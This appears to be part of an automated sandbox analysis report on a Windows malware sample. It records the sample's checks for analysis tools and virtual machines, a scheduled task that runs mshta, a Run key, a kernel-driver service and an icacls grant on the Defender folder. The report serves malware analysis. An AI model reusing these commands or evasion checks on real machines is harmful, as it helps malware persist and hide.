Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Window searched: window name: Regmonclass
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 2S7Jyma4CpI /tr "mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta" /sc minute /mo 25 /ru "user" /f
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE File created: C:\Windows\Tasks\rapes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f4d01cf3f8.exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f4d01cf3f8.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E71C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00E71C41
Uses cacls to modify the permissions of files
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\22.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found API chain indicative of sandbox detection
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Query firmware table information (likely to detect VMs)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: B13378 second address: B1337C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
